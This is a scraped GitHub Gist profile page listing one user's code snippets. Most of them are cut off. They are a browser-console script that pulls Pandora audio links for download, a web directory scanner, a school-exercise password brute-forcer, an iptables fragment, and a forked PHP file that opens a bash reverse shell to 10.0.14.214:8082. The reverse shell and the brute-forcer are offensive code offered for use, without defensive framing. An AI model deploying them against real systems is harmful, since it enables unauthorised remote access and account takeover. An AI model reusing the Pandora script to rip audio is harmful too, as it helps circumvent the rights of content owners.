Skip to content

Instantly share code, notes, and snippets.

View goop32's full-sized avatar
🏳️‍⚧️
struggling with web design

sabrina goop32

🏳️‍⚧️
struggling with web design
View GitHub Profile
@goop32
goop32 / pandorip.js
Created September 18, 2022 17:06
want a song from Pandora? paste this into the JS console of your browser and download away!
audiotags = document.getElementsByTagName("audio");
for (i in audiotags) {
if (!isNaN(i)) {console.log("link: " + audiotags.item(i).src);}
}
@goop32
goop32 / mjolkdir.py
Created December 22, 2021 21:56
mjolkdir, a super simple directory scanning utility
#!/usr/bin/env python3
import requests, argparse
# get and parse arguments w/ argparse
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help = "specify URL to scan")
parser.add_argument("-w", "--wordlist", help = "specify wordlist for use in scanner")
parser.add_argument("-v", "--verbose", help = "use 1 to enable verbose mode, which is basically just throwing you all status codes")
args = parser.parse_args()
@goop32
goop32 / PLTW_1.2.2_Hack_Attack.py
Created December 21, 2021 21:31
PLTW 1.2.2 Hack Attack, but Python (requires requests)
#!/usr/bin/env python3
import requests
username = input("what username should we nuke? ")
hacked = False
password = 2800
while hacked == False:
password += 1
*filter
# Allow all loopback (lo0) traffic and reject traffic
# to localhost that does not originate from lo0.
-A INPUT -i lo -j ACCEPT
-A INPUT ! -i lo -s 127.0.0.0/8 -j REJECT
# Allow ping.
-A INPUT -p icmp -m state --state NEW --icmp-type 8 -j ACCEPT
@goop32
goop32 / shell.php
Created June 3, 2018 19:07 — forked from rshipp/shell.php
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.14.214/8082 0>&1'");